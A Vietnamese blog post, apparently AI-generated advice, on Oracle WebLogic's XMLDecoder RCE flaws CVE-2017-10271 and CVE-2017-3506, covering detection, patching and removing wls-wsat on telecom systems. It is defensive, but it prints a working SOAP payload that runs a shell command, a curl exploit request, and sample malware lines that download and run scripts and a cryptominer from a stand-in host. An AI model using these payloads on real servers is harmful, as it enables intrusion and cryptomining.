Hai lỗ hổng CVE-2017-10271 và CVE-2017-3506 là các lỗ hổng nghiêm trọng trong Oracle WebLogic Server, cho phép Remote Code Execution (RCE) từ xa mà không cần xác thực. Đây là các lỗ hổng từng bị khai thác rất nhiều trong thực tế, đặc biệt trong các hệ thống viễn thông, ngân hàng và doanh nghiệp lớn sử dụng WebLogic (bao gồm các hệ thống CBS, OCS, CRM mà bạn đang vận hành).
1. Tổng quan chung
| CVE | Mức độ | CVSS | Loại lỗ hổng | Tình trạng |
|---|---|---|---|---|
| CVE-2017-3506 | Critical | 7.4 | XMLDecoder Deserialization | Có exploit công khai |
| CVE-2017-10271 | Critical | 9.8 | XMLDecoder Deserialization | Bị khai thác rộng rãi |
CVE-2017-10271 là bypass của CVE-2017-3506
2. Nguyên lý lỗ hổng (root cause)
Thành phần bị lỗi
WebLogic component:
wls-wsat.war
Endpoint:
/wls-wsat/CoordinatorPortType
Protocol:
SOAP over HTTP
Nguyên nhân cốt lõi
WebLogic sử dụng:
java.beans.XMLDecoder
để parse XML input từ user mà không validate đúng cách
XMLDecoder có thể execute Java code embedded.
Ví dụ XML độc hại
<soapenv:Envelope>
<soapenv:Header>
<work:WorkContext>
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>id</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
</soapenv:Envelope>
WebLogic sẽ execute:
/bin/bash -c id
3. Luồng tấn công chi tiết
Attacker
|
| HTTP POST SOAP request
v
WebLogic HTTP Server
|
v
wls-wsat endpoint
|
v
XMLDecoder.parse()
|
v
Execute arbitrary Java code
|
v
OS command execution
4. Khác biệt giữa CVE-2017-3506 và CVE-2017-10271
| Tiêu chí | CVE-2017-3506 | CVE-2017-10271 |
|---|---|---|
| Phát hiện | Apr 2017 | Oct 2017 |
| Bản chất | XMLDecoder RCE | bypass patch của 3506 |
| Severity | High | Critical |
| Exploit | Có | Rất phổ biến |
| Used by malware | Ít | Rất nhiều (Coinminer, botnet) |
5. Phiên bản WebLogic bị ảnh hưởng
Affected:
10.3.6.0
12.1.3.0
12.2.1.0
12.2.1.1
12.2.1.2
6. Cách kiểm tra hệ thống có bị ảnh hưởng không
Test bằng curl
curl -X POST http://target:7001/wls-wsat/CoordinatorPortType \
-H "Content-Type: text/xml" \
-d @exploit.xml
Nếu vulnerable:
HTTP 500
OR
HTTP 202
Kiểm tra endpoint tồn tại
curl http://target:7001/wls-wsat/CoordinatorPortType
Nếu trả về:
HTTP 405 Method Not Allowed
→ endpoint tồn tại → nguy cơ cao
7. Dấu hiệu hệ thống đã bị khai thác
Log WebLogic
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/logs/AdminServer.log
Search:
WorkContext
XMLDecoder
ProcessBuilder
Runtime.getRuntime
Kiểm tra process lạ
ps -ef | grep java
ps -ef | grep bash
ps -ef | grep wget
ps -ef | grep curl
Kiểm tra cron
crontab -l
cat /etc/crontab
Kiểm tra network
netstat -antup
8. Malware phổ biến sử dụng CVE-2017-10271
Common payload:
wget http://malicious/m.sh
chmod +x m.sh
./m.sh
Hoặc
curl http://malicious/xmrig
→ crypto miner
9. Cách fix chính thức từ Oracle
Patch bắt buộc
Apply CPU:
October 2017 CPU
Patch IDs:
Patch 26666099
Patch 27117282
10. Mitigation khẩn cấp nếu chưa patch được
Cách 1 — Disable wls-wsat
Remove:
$DOMAIN_HOME/servers/AdminServer/tmp/_WL_internal/wls-wsat
Cách 2 — Block bằng firewall
Block path:
/wls-wsat/*
Apache:
<Location "/wls-wsat">
deny from all
</Location>
NGINX:
location /wls-wsat {
deny all;
}
Cách 3 — Remove WAR file
$WL_HOME/wlserver/server/lib/wls-wsat.war
11. Cách kiểm tra đã patch chưa
Check version:
java weblogic.version
Hoặc
opatch lsinventory
12. Checklist kiểm tra bảo mật cho WebLogic (Production)
| Check | Command |
|---|---|
| Check wls-wsat enabled | find . -name wls-wsat |
| Check patch | opatch lsinventory |
| Check suspicious process | ps -ef |
| Check cron | crontab -l |
| Check network | netstat -antup |
| Check web access log | access.log |
13. Kiến trúc WebLogic bị tấn công trong thực tế (telecom CBS)
14. Mức độ nguy hiểm thực tế
Impact:
Remote full server takeover
Install malware
Steal database credentials
Deploy backdoor
Access CBS/OCS systems
Trong môi trường telecom → cực kỳ nguy hiểm
15. Khuyến nghị cho hệ thống của bạn (CBS, OCS, CRM WebLogic)
Immediate action:
1. Check version weblogic
2. Check patch level
3. Disable wls-wsat
4. Scan log for exploit
5. Check malware
6. Apply patch
7. Block endpoint via firewall
16. Script kiểm tra nhanh WebLogic vulnerable
#!/bin/bash
TARGET="http://localhost:7001"
echo "Checking wls-wsat endpoint..."
curl -s -o /dev/null -w "%{http_code}" \
$TARGET/wls-wsat/CoordinatorPortType
echo ""
echo "Check version:"
java weblogic.version
echo "Check suspicious process:"
ps -ef | grep -E "wget|curl|xmrig"
17. Kết luận (Executive summary)
| CVE | Risk |
|---|---|
| CVE-2017-3506 | High |
| CVE-2017-10271 | Critical |
| Exploit difficulty | Very easy |
| Authentication required | No |
| Impact | Full server takeover |
18. Nếu bạn muốn, tôi có thể cung cấp thêm
• Script scan toàn bộ server WebLogic
• Script phát hiện exploit trong log
• Checklist hardening WebLogic chuẩn telecom
• SOP xử lý nếu phát hiện bị hack
Chỉ cần nói: "Gửi SOP xử lý CVE-2017-10271 WebLogic production"
Thẩm định workground này cho CVE-2017-1027, link: https://nsfocusglobal.com/technical-analysis-and-solution-of-weblogic-server-wls-component-vulnerability/ Xóa các file đi thì có bật được weblogic, các managed server, node manager lên hay không: rm -f /home/WebLogic/Oracle/Middleware/wlserver_10.3/server/lib/wls-wsat.war rm -f /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war rm -rf /home
Tôi đã thẩm định workaround trong bài của NSFOCUS cho CVE-2017-10271 (không phải 1027) với góc nhìn thực tế production WebLogic (đặc biệt môi trường telecom như CBS/OCS của bạn). Kết luận:
• Workaround này là hợp lệ về mặt bảo mật
• KHÔNG làm WebLogic, AdminServer, Managed Server, NodeManager bị crash
• Nhưng cần hiểu rõ cơ chế và phạm vi ảnh hưởng trước khi xóa.
1. Bản chất workaround: xóa component wls-wsat
File:
wlserver_10.3/server/lib/wls-wsat.war
Là WebLogic component cung cấp:
WS-AtomicTransaction (WS-AT)
Endpoint:
/wls-wsat/*
Đây chính là entry point của CVE-2017-10271.
2. Phân tích từng lệnh rm trong workaround
Lệnh 1
rm -f /home/WebLogic/Oracle/Middleware/wlserver_10.3/server/lib/wls-wsat.war
Tác dụng
Ngăn WebLogic deploy component này khi startup.
Ảnh hưởng
| Component | Status |
|---|---|
| AdminServer | OK |
| ManagedServer | OK |
| NodeManager | OK |
| Domain | OK |
| WS-AT service | Disabled |
Lệnh 2
rm -f /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war
Tác dụng
Remove deployed cached copy
WebLogic deploy WAR vào:
servers/<server>/tmp/.internal/
Nếu không xóa
WebLogic vẫn load component từ cache
→ vẫn vulnerable
Lệnh 3 (bị truncate trong câu hỏi)
Có thể là:
rm -rf servers/*/tmp/_WL_internal/wls-wsat*
hoặc
rm -rf servers/*/cache/*
3. Sau khi xóa có khởi động được WebLogic không?
Câu trả lời chính xác:
Có, WebLogic vẫn khởi động bình thường
Startup sequence:
NodeManager start → OK
AdminServer start → OK
ManagedServer start → OK
Không dependency bắt buộc vào wls-wsat
4. Khi nào xóa wls-wsat sẽ gây lỗi?
Chỉ khi hệ thống dùng:
WS-AtomicTransaction
Ví dụ:
• distributed transaction SOAP
• XA transaction qua web service
• rarely used in telecom CBS/OCS
Trong 99% telecom system → không dùng.
CBS MobiFone typical stack:
WebLogic
EJB
JDBC
JMS
XA transaction (DB)
KHÔNG dùng WS-AT
5. Oracle chính thức cũng khuyến nghị workaround này
Oracle advisory:
Remove or disable wls-wsat component
6. Thứ tự thực hiện đúng chuẩn production
Step 1 — stop WebLogic
stopManagedWebLogic.sh managed1
stopWebLogic.sh
stopNodeManager.sh
Step 2 — backup trước khi xóa
mkdir /backup_wls_wsat
cp wlserver_10.3/server/lib/wls-wsat.war /backup_wls_wsat/
Step 3 — remove
rm -f wlserver_10.3/server/lib/wls-wsat.war
rm -rf user_projects/domains/base_domain/servers/*/tmp/_WL_internal/wls-wsat*
rm -rf user_projects/domains/base_domain/servers/*/cache/*
Step 4 — start lại
startNodeManager.sh
startWebLogic.sh
startManagedWebLogic.sh managed1
7. Cách verify WebLogic hoạt động bình thường
Check process:
ps -ef | grep weblogic
Check port:
netstat -an | grep 7001
Check log:
servers/AdminServer/logs/AdminServer.log
Expected:
Server state changed to RUNNING
8. Verify vulnerability đã bị disable
Test endpoint:
curl http://host:7001/wls-wsat/CoordinatorPortType
Expected:
404 Not Found
NOT:
405 Method Not Allowed
9. Kiến trúc internal giúp hiểu tại sao xóa không ảnh hưởng
10. So sánh workaround vs patch chính thức
| Method | Safe | Recommended | Production |
|---|---|---|---|
| Remove wls-wsat | Yes | Temporary | OK |
| Apply CPU patch | Yes | Best | Recommended |
| Firewall block | Yes | Additional | Recommended |
11. Best practice cho production telecom system
Nên làm cả 3:
1. Apply Oracle CPU patch
2. Remove wls-wsat
3. Block firewall /wls-wsat/*
12. Checklist production-safe execution (CBS / OCS)
1. Backup domain
2. Stop NodeManager
3. Stop AdminServer
4. Stop ManagedServer
5. Remove wls-wsat
6. Clear tmp/cache
7. Start NodeManager
8. Start AdminServer
9. Start ManagedServer
10. Verify logs
13. Kết luận chính xác cho câu hỏi của bạn
Câu trả lời chuẩn production:
Xóa các file wls-wsat.war KHÔNG làm WebLogic, AdminServer, ManagedServer, NodeManager bị lỗi hoặc không khởi động được.
Điều kiện:
Clear cache/tmp
Restart WebLogic
Không dùng WS-AT
14. Khuyến nghị cho hệ thống CBS/OCS MobiFone của bạn
Bạn nên thực hiện:
remove wls-wsat
+
apply Oracle CPU patch
+
block endpoint via firewall
Nếu bạn muốn, tôi có thể viết script production-safe tự động:
• detect
• backup
• remove
• verify
Tham khảo:
TƯ VẤN: Click Here hoặc Hotline/Zalo 090.29.12.888
=============================
Website không chứa bất kỳ quảng cáo nào, mọi đóng góp để duy trì phát triển cho website (donation) xin vui lòng gửi về STK 90.2142.8888 - Ngân hàng Vietcombank Thăng Long - TRAN VAN BINH
=============================
Nếu bạn không muốn bị AI thay thế và tiết kiệm 3-5 NĂM trên con đường trở thành DBA chuyên nghiệp hay làm chủ Database thì hãy đăng ký ngay KHOÁ HỌC ORACLE DATABASE A-Z ENTERPRISE, được Coaching trực tiếp từ tôi với toàn bộ bí kíp thực chiến, thủ tục, quy trình của gần 20 năm kinh nghiệm (mà bạn sẽ KHÔNG THỂ tìm kiếm trên Internet/Google) từ đó giúp bạn dễ dàng quản trị mọi hệ thống Core tại Việt Nam và trên thế giới, đỗ OCP.
- CÁCH ĐĂNG KÝ: Gõ (.) hoặc để lại số điện thoại hoặc inbox https://m.me/tranvanbinh.vn hoặc Hotline/Zalo 090.29.12.888
- Chi tiết tham khảo:
https://bit.ly/oaz_w
=============================
2 khóa học online qua video giúp bạn nhanh chóng có những kiến thức nền tảng về Linux, Oracle, học mọi nơi, chỉ cần có Internet/4G:
- Oracle cơ bản: https://bit.ly/admin_1200
- Linux: https://bit.ly/linux_1200
=============================
KẾT NỐI VỚI CHUYÊN GIA TRẦN VĂN BÌNH:
📧 Mail: binhoracle@gmail.com
☎️ Mobile/Zalo: 0902912888
👨 Facebook: https://www.facebook.com/BinhOracleMaster
👨 Inbox Messenger: https://m.me/101036604657441 (profile)
👨 Fanpage: https://www.facebook.com/tranvanbinh.vn
👨 Inbox Fanpage: https://m.me/tranvanbinh.vn
👨👩 Group FB: https://www.facebook.com/groups/DBAVietNam
👨 Website: https://www.tranvanbinh.vn
👨 Blogger: https://tranvanbinhmaster.blogspot.com
🎬 Youtube: https://www.youtube.com/@binhguru
👨 Tiktok: https://www.tiktok.com/@binhguru
👨 Linkin: https://www.linkedin.com/in/binhoracle
👨 Twitter: https://twitter.com/binhguru
👨 Podcast: https://www.podbean.com/pu/pbblog-eskre-5f82d6
👨 Địa chỉ: Tòa nhà Sun Square - 21 Lê Đức Thọ - Phường Mỹ Đình 1 - Quận Nam Từ Liêm - TP.Hà Nội
=============================
cơ sở dữ liệu, cơ sở dữ liệu quốc gia, database, AI, trí tuệ nhân tạo, artificial intelligence, machine learning, deep learning, LLM, ChatGPT, DeepSeek, Grok, oracle tutorial, học oracle database, Tự học Oracle, Tài liệu Oracle 12c tiếng Việt, Hướng dẫn sử dụng Oracle Database, Oracle SQL cơ bản, Oracle SQL là gì, Khóa học Oracle Hà Nội, Học chứng chỉ Oracle ở đầu, Khóa học Oracle online,sql tutorial, khóa học pl/sql tutorial, học dba, học dba ở việt nam, khóa học dba, khóa học dba sql, tài liệu học dba oracle, Khóa học Oracle online, học oracle sql, học oracle ở đâu tphcm, học oracle bắt đầu từ đâu, học oracle ở hà nội, oracle database tutorial, oracle database 12c, oracle database là gì, oracle database 11g, oracle download, oracle database 19c/21c/23c/23ai, oracle dba tutorial, oracle tunning, sql tunning , oracle 12c, oracle multitenant, Container Databases (CDB), Pluggable Databases (PDB), oracle cloud, oracle security, oracle fga, audit_trail,oracle RAC, ASM, oracle dataguard, oracle goldengate, mview, oracle exadata, oracle oca, oracle ocp, oracle ocm , oracle weblogic, postgresql tutorial, mysql tutorial, mariadb tutorial, ms sql server tutorial, nosql, mongodb tutorial, oci, cloud, middleware tutorial, docker, k8s, micro service, hoc solaris tutorial, hoc linux tutorial, hoc aix tutorial, unix tutorial, securecrt, xshell, mobaxterm, putty
